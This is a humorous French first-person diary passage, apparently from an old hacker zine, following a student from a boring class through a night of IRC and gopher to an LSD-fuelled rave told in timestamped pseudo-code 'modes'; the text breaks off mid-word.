        Et voila, je suis encore en retard... J'attrape la bagnole,
yoops... tout le monde est terne et gris... pfff... j'aurais du rester
au lit!
8h31:
===sleep mode===
8h45:
        Bon, je suis maintenant en cours.... pfff... mais qu'est ce que
c'est chiant... Ca me serait 10000 fois plus utile d'étre devant mon
ordinateur.  J'aurais du rester chez moi.
8h48:
===inattention mode===
18h30:
Ah c'est enfin la fin des cours.... Génial, le week end...
Merde, ya encore la voiture, la bouffe, les devoirs.
18h45:
> faire(OUBLIER)    element(BOUFFE)         objet(CERVEAU)
> faire(SURVOLER)   element(DEVOIR)         objet(FEUILLES)
19h00:
[Connection established]

  SunOS (luna)

login: _
==hacking mode==
6h57:
        Ouh lala... je suis naze... hehe... mais purée, trop cool ce
gopher, et puis cette session en IRC.... woaahhhh... déliiiire!
6h57:
> faire(RAMPER)     element(CORPS)          objet(INDEFINISSABLE AMAS DE CHAIR FATIGUEE)
> faire(ATTEINDRE)  element(COUETTE)        objet(LIT)
7h03:
==sleep mode==
17h45:
==wake up mode==
Heee cool... j'ai bien dormis...
tien si je téléphonais à mes potes de raves, y en a ptet une bonne ce soir!?!
> faire(TELEPHONER)     element(COPAIN)         objet(TELEPHONE)
==chat mode==
Salut!!! alors, on va en rave ce soir???
- Oui, pas de probléme, y en a une super du coté de XXXXXX, passe chez moi.
Ok bye! a tt de suite
- Bye!
==chat mode off==
17h47:
==shake mode on==
ouahhhh...
==shake mode off==
18h08:
Hop... dormir encore pour la rave... bouffer un peu avant quand méme.
> faire(ATTRAPER)       element(MAIN)           objet(JUNK-FOOD.CAFE)
==sleep mode on==
19h13:
WaKe Up !!!!
Ouchh... faut que je me prépare pour la soirée...
Allez, hop, je pars chez mon pote...
> faire(ATTRAPER)       element(MAIN)           objet(WALKMAN)
> faire(SWITCH ON)      element(WALKMAN)        objet(BOUTON)
==Listening Musique-de-brute Mode On==
==travel-sleep mode on==
Ouch... putaing... comment j'ai fait pour arriver là???
Ouahh.... le trou de mémoire!!! affolant ça!!!
Hehe... bon, chuis quand méme chez mon pote c'est déja ça!
==chat mode on==
"Hey... t'en a mis du temps"
- "Heuuuuu... Bin ouais... euhhhh...  alors??? on y va à cette rave?"
- "Yepppp mannn!!!! on y go, hehe, en plus je suis en tire: trop bon!!!"
- "Way Coooooollll... Tient, j'ai des diquettes en chocolat... j'en prend un...
   T'en veux un?"
- "Sure man... envoie!"
> faire(DONNER)         element(COPAIN)         objet(ACIDE)
> faire(GOBBER)         element(BOUCHE)         objet(ACIDE)
==wait-state mode on==
Putain... une heure a attendre avant que ca me fasse de l'effet... ehehe...
Bon...
==drive mode on==
Cooooll... heureusement que c'est lui qui conduit!
==amnesia mode on==
==amnesia mode off==
Putain... j'ai encore eu un trou de mémoire!!!
23h01:
Ouahahahaha... super.... on est dans la rave... dingue... je suis ooops...
acide sous... euhhhh... pas trop d'éléphant vert s'il vous plait pére noel!

AAAaaaaarrrrrGGGhhhHHhhhhh!!!!!!! UN VOL DE PTERODACTYLE !!!!!!!!!!!!!!!!!!!

Huhu... non c'était q'hallu une! euh.... ouais....
Pourkoi je pense dans l'inverse sens... euh... ouais...
ah oui!!! c'est vrai, je acide suis sous!!!! euh... ouaiss...

Euhhhh.... qu'est ce qu'il demande me lui?? euhh... ooouaiss...
==trying-to-understand mode on==
"eeeeeuuuuttttttuuuuuuuuuuuu vvvvvvvvvvv....vvvvveeeeeeuuuuuuuuuuuuhhhhhhh
huuuuuuuuuuuuuunnnnnnnnnnnnn  eeeeeeeccccc...sssssssssttttttttaaaaaaa??????"
==laisse tomber mode on==
Mais qu'est-ce qu'dit il??? je rien comprend !!!!   Il trop parle lentement!
euuhhh... ouuuaiis...

Ahhhh.... j'adore les escargots geants verts !!!   hihi... mais faudrait
qu'il arrete de parler à ma jambe!!!
hu??? maintenant il la suce?!?!!!!!

==DdddeeeeLLLiiiIIIiiIIiiIIiRRRiiuuummmm Maauuuuuudeeuuh hooooonnnnnn==
putaing je fais quoi n'importe !!!!  euuhhh hahahahhaHAH AHahhaha ouais...

Rahhh... il est trop hardcore le bon... hahahaha... j'hallucine!!!!

Mais... mais.... ou je suis là??? euh... hjahahahaha... qu'est ce que je fais
dans les toilettes.... hahahahah

La tête qu'il lui a !!!! hahahaha... vite vite... partir... hihi...
étouffé de rire.... bon... faut que je retrouve mes potes!!!!

ouhlalala... c'est bon... c'est bon.... wise man!!!

Vite.... faut reperer le peuplier à la casquette rouge!!! Il est au milieu des
chasseurs d'entonnoirs!!! hop... c'est bon.... j'y suis...

ah tien... mais je le reconnais lui... hehe... (arghh encore une limace tigrée!)
il traaaaaavvvvaaaaaiiillllleeeuhhh avec Mooaaahh!     hehehe je lui dit ou pas
que je suis sous acccciiiidddddd???
==parole-involontaire mode on==
"Je suis sous acide"
==parole-involontaire mode off==
Meeeerrddde.... pourkoi je lui ai dit???? j'avais même pas décidé si je lui*
disais.... hahahaha... pas grave m'en fout!!!

Hahahahaha... mais qu'est ce qu'il dit me??? euuhhh ouaiiisss....

==trying-to-understand mode on==
"ttttuuuuuu viiieeeennnnsss aaaavvveveeeekkkk mmooooaaaaa.... ooooonnnnn vvvvaaa
ttttoouuuuuucccceeeee llllaaaaabaaaaa...."
- "hein" ????? (mais qu'est ce qu'il raconte me???... euh ouais hahahaha
"tttuuu vvviieen avvvekkk mooiii? on   esst ppparrrr laaa baaa!"
- "heuuuu oui!" (bahh... rien compris mais je le suis quand même!)
==trying-to-understand mode off==
he... m

